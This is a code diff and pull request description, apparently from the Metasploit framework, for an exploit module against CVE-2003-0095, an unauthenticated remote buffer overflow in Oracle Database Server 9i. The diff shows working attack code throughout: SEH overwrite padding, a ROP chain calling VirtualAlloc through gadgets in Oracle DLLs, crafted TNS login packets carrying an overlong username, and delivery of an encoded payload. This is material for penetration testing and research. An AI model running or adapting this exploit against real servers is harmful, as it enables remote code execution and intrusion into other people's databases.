 				oracle_target = targets[2]
-				username = rand_text_alpha_upper(oracle_target['Offset'])+ 
-					nseh + [oracle_target.ret].pack('V') + 
+				username = rand_text_alpha_upper(oracle_target['Offset'])+
+					nseh + [oracle_target.ret].pack('V') +
 					make_nops(328) + payload.encoded
 			end
 			if (not oracle_target)
@@ -119,17 +119,17 @@ class Metasploit3 < Msf::Exploit::Remote
 		elsif target.name =~ /Oracle 9\.0\.1\.1\.1 Enterprise Edition - Microsoft Windows Server 2003 Enterprise Edition Service Pack 2 \(OptOut\)/
 			oracle_target = targets[3]
 			print_status("Attacking using target \"#{oracle_target.name}\"")
-			username = 
-				"\x2e\xd3\x31\x62" * ((oracle_target['Offset'])/4) +	# Padding 844 bytes with the address 0x6231d32e
-				[oracle_target.ret].pack('V') + "\x34\xd3\x31\x62"*61 +	# 0x6230d3a7 # ROP sled (RET) 6231d334 
+			username =
+				"\x2e\xd3\x31\x62" * ((oracle_target['Offset'])/4) +# Padding 844 bytes with the address 0x6231d32e
+				[oracle_target.ret].pack('V') + "\x34\xd3\x31\x62"*61 +# 0x6230d3a7 # ROP sled (RET) 6231d334
 				create_rop_chain() + make_nops(20) + payload.encoded
 		else
 			oracle_target = target
-			uusername = rand_text_alpha_upper(oracle_target['Offset'])+ 
-				nseh + [oracle_target.ret].pack('V') + 
+			uusername = rand_text_alpha_upper(oracle_target['Offset'])+
+				nseh + [oracle_target.ret].pack('V') +
 				make_nops(54) + payload.encoded
 		end
-	
+
 		connect
 		print_status("Sending TNS packet ...")
 		connect_data = "" +
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote
 						"(USER=Administrator)" +
 					")" +
 				")" +
-			
+
 			")"
 
 		packet_length = [58 + connect_data.length].pack('n')
@@ -160,7 +160,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		tns_pkt << "\x01\x37"	# Version: 311
 		tns_pkt << "\x01\x2C"	# Version (Compatible): 300
 		tns_pkt << "\x00\x00"	# Service Options: 0x0000
-		tns_pkt << "\x08\x00"	# Session Data Unit Size: 2048 
+		tns_pkt << "\x08\x00"	# Session Data Unit Size: 2048
 		tns_pkt << "\x7F\xFF"	# Maximum Transmission Data Unit Size: 32767
 		tns_pkt << "\xa3\x0a"	# NT Protocol Characteristics: 0x860e
 		tns_pkt << "\x00\x00"	# Line Turnaround Value: 0
@@ -172,33 +172,33 @@ class Metasploit3 < Msf::Exploit::Remote
 		tns_pkt << "\x01"	# Connect Flags 1: 0x61
 		tns_pkt << "\x00\x00\x00\x00"	# Trace Cross Facility Item 1: 0x00000000
 		tns_pkt << "\x00\x00\x00\x00"	# Trace Cross Facility Item 2: 0x00000000
-		tns_pkt << "\x00\x00\x0c\xb0\x00\x00\x00\x00"	# Trace Unique Connection ID	
+		tns_pkt << "\x00\x00\x0c\xb0\x00\x00\x00\x00"	# Trace Unique Connection ID
 		tns_pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"
 
 		tns_pkt << connect_data	# Connect Data
 		sock.put(tns_pkt)
 
 		res = sock.get_once(-1, 1)
-		print_status(("Received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))		
+		print_status(("Received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
 		redir_port = /PORT=(\d+)/.match(res)[1]
-		print_status("Redirected to port: %d" % redir_port)	
-		
+		print_status("Redirected to port: %d" % redir_port)
+
 		disconnect
-		datastore['RPORT'] =  redir_port
+		connect(true, {'RPORT' => redir_port})
 		connect
 		print_status("Re-sending TNS packet to port %d..." % redir_port)
 		sock.put(tns_pkt)
 		begin
 			res = sock.get_once(-1, 1)
 		rescue ::Errno::ECONNRESET, EOFError
-			fail_with(Exploit::Failure::Unknown, "OOPS!")
+			fail_with(Exploit::Failure::Unknown, "Connection Error.")
 		end
 		print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
 
 		print_status("Sending deadbeef packet ...")
 		tns_deadbeef = [0xdeadbeef].pack('N') + "\x00\x9b\x09\x00\x11\x00\x00\x04\x00\x00\x04\x00" +
 			"\x03\x00\x00\x00\x00\x00\x04\x00\x05\x09\x00\x11\x00\x00\x08\x00" +
-			"\x01\x00\x00\x0c\xb0\xbf\xc8\xfb\x9e\x00\x12\x00\x01\xde\xad\xbe" +			
+			"\x01\x00\x00\x0c\xb0\xbf\xc8\xfb\x9e\x00\x12\x00\x01\xde\xad\xbe" +
 			"\xef\x00\x03\x00\x00\x00\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00" +
 			"\x01\x00\x05\x00\x00\x00\x00\x00\x04\x00\x05\x09\x00\x11\x00\x00" +
 			"\x02\x00\x03\xe0\xe1\x00\x02\x00\x06\xfc\xff\x00\x01\x00\x02\x01" +
@@ -221,11 +221,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			"\x00\x01\x00\x00\x00\x07\xb2\x08\xa2\x09\x00\x09\x00\x37\x00\x00" +
 			"\x00\x0f\x00\x0f\x00\x28\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00" +
 			"\x0f\x52\x4f\x4f\x54\x2d\x32\x33\x44\x39\x33\x31\x41\x30\x46\x43" +
-			"\x57\x4f\x52\x4b\x47\x52\x4f\x55\x50"  
+			"\x57\x4f\x52\x4b\x47\x52\x4f\x55\x50"
 		deadbeef_workgroup_pkt = nsptda_packet(deadbeef_workgroup)
 		sock.put(deadbeef_workgroup_pkt)
 		res = sock.get_once(-1, 1)
-		print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))		
+		print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
 
 		print_status("Sending deadbeef_ntlmssp packet ...")
 		deadbeef_ntlmssp = [0xdeadbeef].pack('N') + "\x00\xef\x09\x00\x11\x00\x00\x01\x00\x00\x01\x00" +
@@ -241,22 +241,22 @@ class Metasploit3 < Msf::Exploit::Remote
 			"\x00\x52\x00\x4f\x00\x4f\x00\x54\x00\x2d\x00\x32\x00\x33\x00\x44" +
 			"\x00\x39\x00\x33\x00\x31\x00\x41\x00\x30\x00\x46\x00\x43\x00\x82" +
 			"\x72\x61\xaa\xfa\xa7\xbd\x5b\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
-			"\x00\x00\x00\x00\x00\x00\x00\x0d\x5a\x05\x07\x57\x12\xb4\x03\x72" + 
-			"\xab\xea\xae\x09\xfe\x47\x4d\x66\x7a\xc7\x6f\x76\x5b\x25\xdb"   
+			"\x00\x00\x00\x00\x00\x00\x00\x0d\x5a\x05\x07\x57\x12\xb4\x03\x72" +
+			"\xab\xea\xae\x09\xfe\x47\x4d\x66\x7a\xc7\x6f\x76\x5b\x25\xdb"
 		deadbeef_ntlmssp_pkt = nsptda_packet(deadbeef_ntlmssp)
 		sock.put(deadbeef_ntlmssp_pkt)
 		# res = sock.get_once(-1, 1)
-		# print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))		
+		# print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
 
 		print_status("Sending sql_ssp packet ...")
-		sql_ssp = 
+		sql_ssp =
 			"\x01\x06\x05\x04\x03\x02\x01\x00\x49\x42\x4d\x50\x43\x2f\x57\x49" +
 			"\x4e\x5f\x4e\x54\x2d\x38\x2e\x31\x2e\x30\x00"
 		sql_ssp_pkt = nsptda_packet(sql_ssp)
 		sock.put(sql_ssp_pkt)
 		res = sock.get_once(-1, 1)
 		print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
-	
+
 		print_status("Sending sql_ssdt packet ...")
 		sql_ssdt = "\x02\xb2\x00\xb2\x00\x00\x15\x06\x01\x01\x01\x05\x01\x01\x01\x01" +
 			"\x01\x01\x01\x01\x01\x01\x07\x07\x03\x05\x03\x00\x02\x02\x01\x80" +
@@ -267,46 +267,45 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = sock.get_once(-1, 1)
 		print_status(("Received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
 
-   		host_str = "ROOT-23D931A0FCWORKGROUP\\ROOT-23D931A0FCAdministrator3248:2664loadpsp.exe";
+		host_str = "ROOT-23D931A0FCWORKGROUP\\ROOT-23D931A0FCAdministrator3248:2664loadpsp.exe";
 		print_status("Exploiting with host string: %s" % host_str)
-		
-   		tns_login =
+
+		tns_login =
 			"\x03\x52\x02\x53\x44\x32\x00\xd2\x07\x00\x00\x00\x00\x00\x00\x00" +
 			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
 			"\x00\x00\x00\x3a\xbb\xd6\x00\x0f\x00\x00\x00\x79\xbc\xd6\x00\x1a" +
 			"\x00\x00\x00\x39\xbc\xd6\x00\x0d\x00\x00\x00\x30\x11\x00\x00\xf9" +
 			"\xbc\xd6\x00\x09\x00\x00\x00\x09\xbd\xd6\x00\x0b\x00\x00\x00\x00" +
-			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca" + 
+			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca" +
 			"\xb6\xd6\x00\x21\x00\x00\x00\xc8\xb6\xd6\x00" + username
-			
+
 		tns_login_pkt = nsptda_packet(tns_login)
 		sock.put(tns_login_pkt)
 		tns_login = "A"*300 + host_str
 		tns_login_pkt = nsptda_packet(tns_login)
 		sock.put(tns_login_pkt)
-				
-		handler
-		sleep(10)
+
+		select(nil, nil, nil, 10)
 		disconnect
 	end
 	def create_rop_chain()
-		rop_gadgets = 
+		rop_gadgets =
 		[
-			0x004a9cb1,	# POP EBP # RETN [ORACLE.EXE] 
+			0x004a9cb1,	# POP EBP # RETN [ORACLE.EXE]
 			0x004a9cb1,	# skip 4 bytes [ORACLE.EXE]
-			0x0055a3ad,	# POP EBX # RETN [ORACLE.EXE] 
+			0x0055a3ad,	# POP EBX # RETN [ORACLE.EXE]
 			0x00000001,	# 0x00000001-> ebx
-			0x615aa6a2,	# POP EDX # RETN [orannzsbb9.dll] 
+			0x615aa6a2,	# POP EDX # RETN [orannzsbb9.dll]
 			0x00001000,	# 0x00001000-> edx
-			0x615ced5a,	# POP ECX # RETN [orannzsbb9.dll] 
+			0x615ced5a,	# POP ECX # RETN [orannzsbb9.dll]
 			0x00000040,	# 0x00000040-> ecx
-			0x010238dc,	# POP EDI # RETN [ORACLE.EXE] 
+			0x010238dc,	# POP EDI # RETN [ORACLE.EXE]
 			0x61607ec8,	# RETN (ROP NOP) [orannzsbb9.dll]
-			0x0099c854,	# POP ESI # RETN [ORACLE.EXE] 
+			0x0099c854,	# POP ESI # RETN [ORACLE.EXE]
 			0x619616a4,	# JMP [EAX] [oranldap9.dll]
-			0x60b0ec89,	# POP EAX # RETN [orapls9.dll] 
+			0x60b0ec89,	# POP EAX # RETN [orapls9.dll]
 			0x6232f128,	# ptr to &VirtualAlloc() [IAT ORATRACE9.dll]
-			0x6043c453,	# PUSHAD # RETN [orageneric9.dll] 
+			0x6043c453,	# PUSHAD # RETN [orageneric9.dll]
 			0x61961c88,	# ptr to 'push esp # ret ' [oranldap9.dll]
 		].flatten.pack("V*")
 		return rop_gadgets
@@ -327,11 +326,11 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 	def nsptda_packet(data)
 		# Snipplet from exploit/windows/oracle/tns_auth_sesskey.rb
-		pkt = [data.length + 10].pack('n') 
+		pkt = [data.length + 10].pack('n')
 		pkt << [0].pack('n')
-		pkt << [6].pack('C') 
-		pkt << [0].pack('C') 
-		pkt << [0].pack('n') 
+		pkt << [6].pack('C')
+		pkt << [0].pack('C')
+		pkt << [0].pack('n')
 		pkt << [0].pack('n')
 		pkt << data
 		return pkt

--- a/modules/exploits/windows/oracle/oraloadpsp.rb
+++ b/modules/exploits/windows/oracle/oraloadpsp.rb
@@ -24,6 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Author'         => [
 						'dominicwang <domz.wang@nopsec.com>',
 						'corelanc0d3r <peter.ve@corelan.be>',
+						'morpheuslaw <msidagni@nopsec.com>',
 							],
 			'License'        => MSF_LICENSE,
 			'References'     =>


### PR DESCRIPTION
Added exploit module for CVE-2003-0095 - Oracle Database Server Unauthenticated Remote Overflow

Blog post : http://www.nopsec.com/blog/entry/cve-2003-0095-oracle-database-server-unauthenticated-remote-overflow-metasploit-module

Buffer overflow in ORACLE.EXE for Oracle Database Server 9i, 8i, 8.1.7, and 8.0.6 allows remote attackers to execute arbitrary code via a long username that is provided during login, as exploitable through client applications that perform their own authentication, as demonstrated using LOADPSP.

![MSF-CVE-2003-0095](https://f.cloud.github.com/assets/567928/305077/a5d89b0e-964e-11e2-8d39-4a2642be869d.png)

Targets:
- Oracle 9.0.1.1.1 Enterprise Edition - (OptIn)
- Oracle 9.2.0.1.0 Enterprise Edition (OptIn)
- Oracle 9.0.1.1.1 Enterprise Edition - Microsoft Windows Server 2003 Enterprise Edition Service Pack 2 (OptOut)
